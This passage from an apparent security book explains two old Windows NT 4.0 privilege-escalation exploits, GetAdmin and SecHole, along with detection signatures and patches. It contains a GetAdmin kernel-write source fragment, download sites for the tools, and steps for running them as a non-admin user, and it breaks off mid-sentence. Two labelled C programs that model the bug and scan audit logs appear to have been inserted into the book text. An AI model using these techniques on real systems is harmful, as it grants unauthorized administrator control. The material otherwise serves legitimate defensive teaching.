
As you can see, the resource kit has a lot of valuable tools that make it easier to protect and monitor the security of your NT servers.

Hardening Guides

There are many hardening guides available to assist an administrator in the hardening of her operating system. These guides offer an administrator a step-by-step procedure for locking down her machines. They also assist network administrators by offering a repeatable process so that steps are not missed. There are several hardening guides available, but one of the best is published by SANS at http://www.sans.org.

Summary

In this chapter, we covered a lot of ground and laid the foundation for understanding the specific NT exploits, which will be explained next. It is important to remember that even though this chapter concentrated on NT, a lot of the concepts we covered apply to all operating systems. For example, no matter what operating system you run, it is critical that you know and understand what is running on the system in terms of services, open ports, user accounts, and network protocols. There is no way that you can protect a system if you do not know what you are protecting.

Chapter 12. Specific Exploits for NT

NT SERVERS ARE USED BY A LARGE NUMBER OF companies for mission-critical applications. NT servers are also used as the base operating system for firewalls and web servers, which are directly accessible from the Internet. Whenever operating systems have such a large installation base, the potential for abuse increases. Attackers will try to compromise these systems to gain access to sensitive information. Therefore, it is critical for administrators to understand the threats and exploits that exist for NT, so they can properly secure their systems.

One book cannot cover every single exploit for NT because there are too many. This does not just apply to Microsoft’s operating systems, however, because most operating systems have numerous exploits. The goal of this chapter is to build on the base information covered in Chapter 11, “Fundamentals of Microsoft NT” and discuss a range of specific NT exploits. The descriptions of these exploits are meant to give you a better understanding of how each specific exploit works and the types of things attackers use to compromise a system. After we discuss these exploits, you will have a better appreciation for what needs to be done to secure your NT systems.

Hackers Beware, New Riders Publishing

460

Exploits for NT

The following are the NT exploits we cover in this chapter:

GetAdmin

Sechole

Red Button

RDS Security Hole in Microsoft IIS

Microsoft Shares

Legion

Relative shell path vulnerability

NT DSN Hijack using ODBC data source tools

Winfreeze

Microsoft Windows Media Player JavaScript URL Vulnerability

Microsoft Internet Explorer ‘mstask.exe’ CPU Consumption Vulnerability

Microsoft MSHTML.DLL Crash Vulnerability

2001 IIS 5.0 allows files to be viewed using %3F+.htr

Media Player 7 and IE Java vulnerability

IE 5.x/Outlook allows arbitrary programs to be executed using .chm files and the temporary Internet file folder.

IIS 5.0 with patch Q277873 allows arbitrary commands to be executed on the web server

Microsoft WINS Domain Controller Spoofing Vulnerability

These examples discuss a wide range of exploits against various aspects of Microsoft NT. Some of these exploits are old, but they have been included to show some of the ways NT has been exploited. They have been included based on this philosophy: The best way to approach the future is to learn from the past. I have seen cases where an older exploit has been fixed, but a newer version of the operating system becomes vulnerable again to the same exploit. In other cases, the system is patched against a specific exploit, but the underlying vulnerability that enables the exploit to work is still present on the system. One such example is Red Button. This is an exploit that has been around for a while, and most systems have been patched. However, the underlying vulnerability, improper permissions, is still present on most systems. This is why it is still important to understand and protect against some of the older exploits.


What is CVE?

As you go through these exploits, you may notice in the “Exploit Details” sections that there is a CVE number listed for the exploit. CVE stands for Common Vulnerabilities and Exposures, and it is an effort by Mitre to come up with a list of standardized names for vulnerabilities and other information security exposures. CVE aims to standardize the names for all publicly known vulnerabilities and security exposures. The goal of CVE is to make it easier to share data across separate vulnerability databases and security tools. Although CVE may make it easier to search for information in other databases, CVE should not be considered as a vulnerability database on its own merit—no database can contain all possible vulnerabilities and exposures. Additional information can be found at cve.mitre.org. CVE is a great effort, and if you are not familiar with it, you should definitely go to Mitre’s Web site.

GetAdmin

GetAdmin is a tool used to escalate privileges on an NT system. Some exploits give you administrator access immediately, but others yield only a lower level of access. In those cases you would start with an ordinary, non-privileged user account and then use a tool like GetAdmin to elevate it to administrator.

Exploit Details

Name: GetAdmin

CVE Number: CVE-1999-0496

Operating System: Microsoft NT 4.0

Protocols/Services: Win Logon Process

Brief Description: An attack that grants administrative rights to normal users by adding them to the Administrators group

Getadmin.exe is a utility available on the Internet that grants administrative rights to normal users by adding them to the Administrators group. Getadmin.exe can be run from any user context, except Guest, and it grants administrative rights to a local user account. This utility works by taking advantage of a weakness in the WinLogon process on Windows NT 4.0 systems.

Detailed Description

GetAdmin works because of a problem in a low-level kernel routine, which causes a global flag to be set, allowing calls to NtOpenProcessToken to succeed regardless of the current user’s permissions. This in turn allows a user to attach to any process running on the system, including processes running in the system’s security context, such as WinLogon. Once a user is attached to such a process, a thread can be started in the security context of the process.

In the specific case of GetAdmin, it attaches to the WinLogon process, which is running in the system’s security context, and makes standard API calls that add the specified user to the Administrators group.

It is important to note that any account granted the right to “Debug Programs” will always be able to run Getadmin.exe successfully, even if the hot fix is applied to fix this problem because the Debug Programs right enables a user to attach to any process. Debug Programs is initially granted to administrators, and it should only be granted to well-trusted users.

Also, if Getadmin.exe is run with an account that is already a member of the administrators’ local group, it will work even after applying the hot fix. This is by design. Members of the administrators’ group always have the right to make the calls GetAdmin needs to succeed.

Symptoms

Getadmin.exe must be executed locally, and it works for accounts on a workstation or member server and for domain accounts on a primary domain controller (PDC). The utility does not function on a backup domain controller (BDC) because the account database on a BDC is read only. The only way to modify a domain account database using GetAdmin is to log on to a PDC and run the utility locally on the PDC. In most environments, only administrators should have local access to log on to the PDC. Therefore, one of the main symptoms indicating that the GetAdmin utility is possibly being exploited is a non-privileged user logging on locally to the PDC.

Signature

To detect whether someone has used the GetAdmin exploit, security auditing must be turned on. The events that need auditing are Security Policy Changes and Process Tracking. When the appropriate auditing is turned on, the following event occurs in the security log and can be viewed with Event Viewer in NT:

A new process has been created:

New Process ID: 2159001632

Image File Name: GetAdmin.exe

Creator Process ID: 2154990112


User Name: Eric

Domain: NTSERVER4A

Logon ID: (0x0,0x1E14)

The easiest way to detect whether this exploit has been run is to see that a file named GetAdmin has been run. However, it would be very easy for an attacker to rename the program before running it, so a match on the file name alone is weak evidence.

This is one of the main reasons it is so important to review the audit files on a daily basis and to fully understand what is being run on any of your systems. One of the first rules of security is know thy system.

Another signature is the Registry activity an exploit triggers. When GetAdmin adds the new administrator, lsass.exe opens and queries the LSA Policy keys, and that access can be captured with a Registry monitor. The following is a log dump from the Registry Monitor (REGMON) showing which Registry keys are accessed during execution of GetAdmin. This takes more work to detect than a process name, but it does not depend on the file name the attacker chose, so it is a better symptom of the GetAdmin exploit.

21 lsass.exe OpenKey 0xE1237D40\Policy SUCCESS Key: 0xE18995C0

22 lsass.exe OpenKey 0xE1237D40\Policy\SecDesc SUCCESS Key: 0xE16C9E60

23 lsass.exe QueryValue 0xE1237D40\Policy\SecDesc BUFOVRFLOW

24 lsass.exe CloseKey 0xE1237D40\Policy\SecDesc SUCCESS Key: 0xE16C9E60

26 lsass.exe OpenKey 0xE1237D40\Policy\SecDesc SUCCESS Key: 0xE16C9E60

27 lsass.exe QueryValue 0xE1237D40\Policy\SecDesc SUCCESS NONE

28 lsass.exe QueryValue 0xE1237D40\Policy\SecDesc SUCCESS NONE

43 lsass.exe OpenKey 0xE1237D40\Policy\SecDesc SUCCESS Key: 0xE16C9E60

44 lsass.exe QueryValue 0xE1237D40\Policy\SecDesc BUFOVRFLOW

45 lsass.exe CloseKey 0xE1237D40\Policy\SecDesc SUCCESS Key: 0xE16C9E60

46 lsass.exe OpenKey 0xE1237D40\Policy\SecDesc SUCCESS Key: 0xE16C9E60

47 lsass.exe QueryValue 0xE1237D40\Policy\SecDesc SUCCESS NONE

48 lsass.exe QueryValue 0xE1237D40\Policy\SecDesc SUCCESS NONE

49 lsass.exe CloseKey 0xE1237D40\Policy\SecDesc SUCCESS Key: 0xE16C9E60

This log dump shows which keys lsass.exe opened and queried (the entries are OpenKey, QueryValue and CloseKey operations, not writes), and an automated scanning tool can be configured to look for this sequence. Treat it as supporting evidence rather than proof: lsass.exe reads Policy\SecDesc during other LSA policy operations as well, so the pattern is strongest when it coincides with a process started by a non-privileged user.

REGMON is the Sysinternals Registry Monitor, a free tool that records Registry accesses by every process in real time. Remember the concept of defense in depth; REGMON should be one of the many tools in a company’s security arsenal.

How to Protect Against It


The best way to protect against the GetAdmin exploit is to apply a fix to the Windows NT Kernel routine, developed by Microsoft, which fixes the call that sets the global flag. This fix prevents an application, such as Getadmin.exe, from attaching to WinLogon (or any other process not owned by the user) and from granting administrative rights to users.

To resolve this problem, obtain the latest service pack for Windows NT 4.0 or Windows NT Server 4.0, Terminal Server Edition. For additional information, please see Microsoft Knowledge Base article Q152734.

Source Code/Pseudo Code

Given the nature of the GetAdmin program, it gets administrator rights without requiring any special privileges. Simply run GetAdmin or GetAdmin account_name from a command line. If you do not enter an account name, the current account is used. The following is a sample of the GetAdmin source. It is written for 32-bit NT 4.0 on x86 with Microsoft’s inline assembler, because it enters the kernel directly through interrupt 0x2e using the NT 4.0 system call number of NtAddAtom:

Function ChangeNtGlobalFlag:

BOOL ChangeNtGlobalFlag(DWORD pNtGlobalFlag)
{
    DWORD callnumber = 0x3;      /* NT 4.0 system call number of NtAddAtom */
    DWORD stack[32];             /* argument block handed to the kernel */
    int   i;
    DWORD handle = 0;            /* NtAddAtom writes the new atom handle here */
    CHAR  string[255];

    if (!pNtGlobalFlag) return 0;

    stack[0] = (DWORD)string;    /* atom name */
    stack[1] = (DWORD)&handle;   /* output pointer the kernel never validates */
    for (i = 0; i < 0x100; i++)
    {
        sprintf(string, "NT now cracking... pass %d", i);
        /* once the handle carries bits in 0xf00, aim the next write one byte
           past NtGlobalFlag so that byte lands in NtGlobalFlag+2 */
        if (handle & 0xf00) {
            stack[1] = (DWORD)pNtGlobalFlag + 1;
        }
        __asm
        {
            mov eax, callnumber;        /* system call number */
            mov edx, stack;
            lea edx, dword ptr [stack]; /* pointer to the argument block */
            int 0x2e;                   /* NT 4.0 system call gate */
        }
        if (stack[1] == pNtGlobalFlag + 1) break;
    }
    return TRUE;
}

The following call does most of the work in GetAdmin:

ChangeNtGlobalFlag(GetNtGlobalFlagPtr());

After running GetAdmin, you can open any process in the system because the function NtOpenProcess does not check for SE_DEBUG_PRIVILEGE if the bit in NtGlobalFlag+2 is set. GetAdmin then injects its DLL into the WinLogon process. WinLogon runs as the SYSTEM account, so code injected into it can add or remove users in the Administrators group.

The main bug in NT is that the subfunction behind NtAddAtom does not validate the caller-supplied output address before writing the new atom handle to it, so a user-mode program can write into any address in kernel memory. Injecting a DLL into WinLogon is only one way to turn that write into administrator rights; you could instead patch the relevant kernel code directly or replace the process token. If you have the full source code, you can experiment with other variations of GetAdmin.
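As an added example (not GetAdmin’s code and not from the book), the following C program models the bug class just described: a system call that writes its result through a caller-supplied pointer without validating it. Memory is a byte array, the user/kernel boundary is an index, and the flag bit, addresses, starting handle value and function names are hypothetical. It shows why GetAdmin’s loop waits for a handle with the right bits and then aims the write at NtGlobalFlag+1 so that byte lands in NtGlobalFlag+2, and why validating the output pointer (the kernel fix) stops it.

```c
/* Added example, not GetAdmin's code: a user-mode model of the NtAddAtom
 * output-pointer bug and its fix. "Memory" is a byte array, the user/kernel
 * boundary is an index, and NtGlobalFlag is a 32-bit little-endian value in
 * that array. FLAG_BIT, the addresses and the starting atom handle are
 * assumptions chosen so the demo finishes in a few iterations. */
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MEM_SIZE        64
#define USER_SPACE_END  32      /* addresses below this are "user space" */
#define NT_GLOBAL_FLAG  40      /* address of the 32-bit flag */
#define FLAG_BIT        0x04    /* hypothetical bit in byte NtGlobalFlag+2: when set,
                                   NtOpenProcess skips the SE_DEBUG_PRIVILEGE check */

static uint8_t  mem[MEM_SIZE];
static uint32_t next_atom;

static void reset_model(void) {
    memset(mem, 0, sizeof mem);
    next_atom = 0xC3F0;         /* bit 0x400 of the handle becomes set after 16 atoms */
}

/* Little-endian store/load so the byte layout does not depend on the host. */
static void store32(size_t addr, uint32_t v) {
    for (int k = 0; k < 4; k++) mem[addr + k] = (uint8_t)(v >> (8 * k));
}
static uint32_t load32(size_t addr) {
    uint32_t v = 0;
    for (int k = 0; k < 4; k++) v |= (uint32_t)mem[addr + k] << (8 * k);
    return v;
}

/* The bug: the new handle is written wherever out_ptr points, with no check
 * that out_ptr is a user-space address (no ProbeForWrite). */
static int add_atom_unpatched(size_t out_ptr) {
    store32(out_ptr, next_atom++);
    return 0;
}

/* The fix: refuse any output pointer that is not entirely in user space. */
static int add_atom_patched(size_t out_ptr) {
    if (out_ptr + 4 > USER_SPACE_END) return -1;    /* STATUS_ACCESS_VIOLATION */
    store32(out_ptr, next_atom++);
    return 0;
}

/* Kernel side of NtOpenProcess as the book describes it: the privilege check
 * is skipped when the flag bit in NtGlobalFlag+2 is set. */
static bool open_process_allowed(bool caller_has_debug_privilege) {
    return caller_has_debug_privilege || (mem[NT_GLOBAL_FLAG + 2] & FLAG_BIT);
}

/* User side, mirroring GetAdmin's loop: allocate atoms into a scratch variable
 * until the handle's second byte carries FLAG_BIT, then redirect the output
 * to NtGlobalFlag+1 so that byte lands in NtGlobalFlag+2. GetAdmin tests
 * handle & 0xf00; this model tests the exact bit it needs. */
static bool flip_global_flag(int (*add_atom)(size_t), size_t scratch) {
    for (int i = 0; i < 0x100; i++) {
        uint32_t last = load32(scratch);
        size_t target = ((last >> 8) & FLAG_BIT) ? NT_GLOBAL_FLAG + 1 : scratch;
        if (add_atom(target) != 0) return false;    /* patched kernel refuses */
        if (open_process_allowed(false)) return true;
    }
    return false;
}

/* Can a caller without SE_DEBUG_PRIVILEGE open any process afterwards? */
static bool unprivileged_caller_wins(bool patched) {
    reset_model();
    flip_global_flag(patched ? add_atom_patched : add_atom_unpatched, 8);
    return open_process_allowed(false);
}

int main(void) {
    printf("unpatched kernel: unprivileged open succeeds = %d\n", unprivileged_caller_wins(false));
    printf("patched kernel:   unprivileged open succeeds = %d\n", unprivileged_caller_wins(true));
    return 0;
}
```

On the unpatched path NtGlobalFlag ends up holding 0x00C40100: because the write was aimed one byte early, the handle’s low byte landed in byte 1, the byte carrying the wanted bit in byte 2, and the last byte of the 32-bit handle spilled into whatever follows the flag. The real GetAdmin write has the same one-byte spill.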

The GetAdmin program can be downloaded from the Internet in the form of a zip file. The file contains two files—an executable and a dll that is needed for the executable. After the program is downloaded, unzip the two files into a directory and run them from a DOS window. To run the program, you type getadmin from the DOS prompt. If it works, you do not receive any message, and you are returned to the prompt. If there is a problem, a message is displayed. The following is the output from running the program:

C:\getadmin>getadmin

C:\getadmin>

The following sites contain source code and executables for GetAdmin:

http://www.infowar.co.uk/mnemonix/utils.htm

http://hackersclub.com/km/files/nt/index.html

http://www.insecure.org

Additional Information

Additional information can be downloaded from the following sites:

http://www.microsoft.com/security

http://www.microsoft.com/ntserver/security/default.asp

http://www.infowar.co.uk/mnemonix/utils.htm#admin

http://hackersclub.com/km/files/nt/index.html

http://www.insecure.org

SecHole

SecHole performs a very sophisticated set of steps that enable a nonadministrative user to gain debug-level access on a system process.

Exploit Details

Name: SecHole

CVE Number: CVE-1999-0344


Operating System: Microsoft NT Server and Workstation

SecHole.exe is a utility that is being circulated to perform a very sophisticated set of steps that allow a non-administrative user to gain debug-level access on a system process. By using SecHole, the nonadministrative user is able to run some code in the system security context and, thereby, grant himself local administrative privileges on the system. SecHole locates the memory address of a particular API function and modifies the instructions at that address in a running image of the exploit program on the local system. SecHole.exe requests debug rights, giving it elevated privileges. The request is successful because the access check for this right is expected to be done in the API, which was successfully modified by the exploit program. SecHole.exe can now add the user who invoked SecHole.exe to the local Administrators group.

The following are the versions of NT affected by this exploit:

Microsoft Windows NT Server versions 3.51, 4.0

Microsoft Windows NT Workstation versions 3.51, 4.0

Microsoft Windows NT Server, Enterprise Edition version 4.0

Microsoft Windows NT Server version 4.0, Terminal Server Edition.

Detailed Description

By exploiting existing Windows NT services, an application can locate a certain API call in memory (OpenProcess), modify the instructions in a running instance, and gain debug-level access to the system, where it then grants the logged-in user complete membership to the Administrators group in the local SAM database.

Specifically, the exploit program does the following:

Locates the memory address of a particular API function used by the DebugActiveProcess function.

Modifies the instructions at that address to return success in a failure case.

Iterates through the processes running as local system, calling DebugActiveProcess on each, until a successful attach is performed. The server side component of DebugActiveProcess does not correctly check for valid access to the target process.

Creates a thread in the victim process that runs code from an accompanying DLL. This thread adds the user who is running the program to the local Administrators group.

Symptoms

SecHole must be executed locally and works for accounts on a workstation or member server and for domain accounts on a PDC. The utility does not function on a BDC because the account database on a BDC is read only. The only way to use SecHole to modify a domain account database is to log on to a PDC and run the utility locally on the PDC.

In most environments, only administrators should have local access to log on to the PDC. Therefore, one of the main symptoms that the SecHole utility may be in use is a non-privileged user logging on locally to the PDC.

Also, ordinary user programs rarely call DebugActiveProcess, so any program calling it could indicate that someone is running SecHole.

Signature

To detect if someone has used the SecHole exploit, security auditing must be turned on. The events that need auditing are Security Policy Changes and Process Tracking. When the appropriate auditing is turned on, the following event occurs in the security log and can be viewed with Event Viewer in NT.

A new process has been created:

New Process ID: 2153850144

Image File Name: SECHOLE.EXE

Creator Process ID: 2153324576

User Name: Eric

Domain: EricNT

Logon ID: (0x0,0x9353)

The easiest way to detect whether the SecHole exploit has been used is to see whether a file named SecHole has been run. However, it would also be very easy for an attacker to rename the program before running it, so a match on the file name alone is weak evidence.

This is one of the main reasons it is so important to review the audit files on a daily basis and to fully understand what is being run on any of your systems.

The following is a log dump from the Registry Monitor (REGMON) showing which Registry keys were accessed during execution of SecHole. This takes more work to detect, but it is a better symptom of the SecHole exploit.

32 winlogon.exe QueryValue 0xE12232C0\SOFTWARE\AntiShut\Account name SUCCESS "TESTACCOUNT"

33 winlogon.exe CloseKey 0xE12232C0\SOFTWARE\AntiShut\Account name SUCCESS Key: 0xE1302420

34 lsass.exe OpenKey 0xE1237D40\Policy SUCCESS Key: 0xE1302420

35 lsass.exe OpenKey 0xE1237D40\Policy\SecDesc SUCCESS Key: 0xE18995C0

36 lsass.exe QueryValue 0xE1237D40\Policy\SecDesc BUFOVRFLOW

37 lsass.exe CloseKey 0xE1237D40\Policy\SecDesc SUCCESS Key: 0xE18995C0

38 lsass.exe OpenKey 0xE1237D40\Policy\SecDesc SUCCESS Key: 0xE18995C0

39 lsass.exe QueryValue 0xE1237D40\Policy\SecDesc SUCCESS NONE

40 lsass.exe QueryValue 0xE1237D40\Policy\SecDesc SUCCESS NONE

41 lsass.exe CloseKey 0xE1237D40\Policy\SecDesc SUCCESS Key: 0xE18995C0

42 lsass.exe OpenKey 0xE1237D40\Policy SUCCESS Key: 0xE18995C0

43 lsass.exe OpenKey 0xE1237D40\Policy\SecDesc SUCCESS Key: 0xE16C9E60

44 lsass.exe QueryValue 0xE1237D40\Policy\SecDesc BUFOVRFLOW

45 lsass.exe CloseKey 0xE1237D40\Policy\SecDesc SUCCESS Key: 0xE16C9E60

46 lsass.exe OpenKey 0xE1237D40\Policy\SecDesc SUCCESS Key: 0xE16C9E60

47 lsass.exe QueryValue 0xE1237D40\Policy\SecDesc SUCCESS NONE

48 lsass.exe QueryValue 0xE1237D40\Policy\SecDesc SUCCESS NONE

49 lsass.exe CloseKey 0xE1237D40\Policy\SecDesc SUCCESS Key: 0xE16C9E60

REGMON is the Sysinternals Registry Monitor, a free tool that records Registry accesses by every process in real time.
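The GetAdmin and SecHole Signature sections both describe the same two process-creation signals: a known exploit image name (weak, because the binary can be renamed) and a process created by a non-privileged user on a PDC (the symptom the book calls out). The following C program, an added example that is not from the book, applies both to audit-log text in the format shown above. The log is constructed: the first record is the book’s GetAdmin event, the other two are made up, and KNOWN_IMAGES and ADMINS are assumptions for the demo.

```c
/* Added example, not from the book: the two process-creation signatures the
 * Signature sections describe, run over constructed audit-log text in the
 * format the book shows. KNOWN_IMAGES, ADMINS and SAMPLE_LOG are assumptions. */
#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

#define MAXF 128
#define REC_START "A new process has been created"
#define COUNT(a) (sizeof (a) / sizeof *(a))

struct proc_event { char image[MAXF]; char user[MAXF]; };

/* Weak signal: the file names the tools ship with; an attacker can rename them. */
static const char *const KNOWN_IMAGES[] = { "getadmin.exe", "sechole.exe" };
/* Accounts expected to run programs on the PDC (assumed for the demo). */
static const char *const ADMINS[] = { "Administrator" };

enum { SIG_NONE = 0, SIG_KNOWN_IMAGE = 1, SIG_NONADMIN_ON_PDC = 2 };

/* Constructed log: record 1 is the book's; records 2 and 3 are made up
 * (a benign program run by an administrator, and a renamed tool run by Eric). */
static const char SAMPLE_LOG[] =
    "A new process has been created:\n"
    "New Process ID: 2159001632\n"
    "Image File Name: GetAdmin.exe\n"
    "Creator Process ID: 2154990112\n"
    "User Name: Eric\n"
    "Domain: NTSERVER4A\n"
    "Logon ID: (0x0,0x1E14)\n"
    "A new process has been created:\n"
    "Image File Name: C:\\WINNT\\system32\\notepad.exe\n"
    "User Name: Administrator\n"
    "Domain: NTSERVER4A\n"
    "A new process has been created:\n"
    "Image File Name: C:\\TEMP\\svchelp.exe\n"
    "User Name: Eric\n"
    "Domain: NTSERVER4A\n";

/* Case-insensitive equality (NT file and account names are not case-sensitive). */
static bool ieq(const char *a, const char *b) {
    while (*a && *b && tolower((unsigned char)*a) == tolower((unsigned char)*b)) { a++; b++; }
    return *a == '\0' && *b == '\0';
}

static bool in_list(const char *s, const char *const *list, size_t n) {
    for (size_t i = 0; i < n; i++) if (ieq(s, list[i])) return true;
    return false;
}

/* If line starts with key, copy the rest of the line (minus CR/LF) into dst. */
static void take_value(const char *line, const char *key, char *dst) {
    size_t klen = strlen(key);
    if (strncmp(line, key, klen) != 0) return;
    line += klen;
    while (*line == ' ') line++;
    size_t vlen = strcspn(line, "\r\n");
    if (vlen >= MAXF) vlen = MAXF - 1;
    memcpy(dst, line, vlen);
    dst[vlen] = '\0';
}

/* Bit 1: image name of a known tool (path stripped). Bit 2: process created
 * by a non-administrator on a PDC, the symptom the book calls out. */
static int classify(const struct proc_event *e, bool host_is_pdc) {
    const char *base = strrchr(e->image, '\\');
    int sig = SIG_NONE;
    base = base ? base + 1 : e->image;
    if (in_list(base, KNOWN_IMAGES, COUNT(KNOWN_IMAGES))) sig |= SIG_KNOWN_IMAGE;
    if (host_is_pdc && !in_list(e->user, ADMINS, COUNT(ADMINS))) sig |= SIG_NONADMIN_ON_PDC;
    return sig;
}

/* Walk the exported log one record at a time; returns the number of flagged
 * records and ORs every signature found into *seen. */
static int scan_log(const char *log, bool host_is_pdc, int *seen) {
    struct proc_event e;
    bool in_rec = false;
    int flagged = 0, s;
    *seen = SIG_NONE;
    for (const char *p = log; *p; ) {
        while (*p == ' ' || *p == '\t') p++;
        if (strncmp(p, REC_START, strlen(REC_START)) == 0) {
            if (in_rec) { s = classify(&e, host_is_pdc); flagged += (s != SIG_NONE); *seen |= s; }
            memset(&e, 0, sizeof e);
            in_rec = true;
        } else if (in_rec) {
            take_value(p, "Image File Name:", e.image);
            take_value(p, "User Name:", e.user);
        }
        const char *nl = strchr(p, '\n');
        if (!nl) break;
        p = nl + 1;
    }
    if (in_rec) { s = classify(&e, host_is_pdc); flagged += (s != SIG_NONE); *seen |= s; }
    return flagged;
}

static int flagged_count(bool pdc) { int seen; return scan_log(SAMPLE_LOG, pdc, &seen); }
static int signatures_seen(bool pdc) { int seen; scan_log(SAMPLE_LOG, pdc, &seen); return seen; }

int main(void) {
    printf("PDC: %d record(s) flagged, signatures 0x%x\n", flagged_count(true), signatures_seen(true));
    printf("member server: %d record(s) flagged, signatures 0x%x\n", flagged_count(false), signatures_seen(false));
    return 0;
}
```

On a PDC the scan flags two records: the GetAdmin run (both signatures) and the renamed svchelp.exe run by Eric (only the non-administrator signature, which is exactly the case the name check misses). On a member server only the name match fires. Neither signal proves an exploit on its own; the decisive evidence is the outcome both tools produce, a new member of the local Administrators group, so compare group membership against a known-good baseline whenever either signal fires.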

How to Protect Against It

To resolve this problem, obtain the latest service pack for Windows NT version 4.0. For more information, please see Microsoft Knowledge Base article Q152734.

SecHole Program

Any normal (non-administrative) user on a Windows NT system can instantly gain administrative control of the entire machine by running SecHole. First, log in as any non-administrative user on a machine (a guest account will do). You can verify that the logged-in user does not possess administrative privilege at this time by trying to run the windisk program (Disk Administrator) from a DOS prompt. This should fail because the user does not have administrative privilege.

After logging in, copy the software (sechole.exe and admindll.dll) onto your hard disk in any directory that allows you write and execute access. Open up a DOS window and run the corresponding program. After running
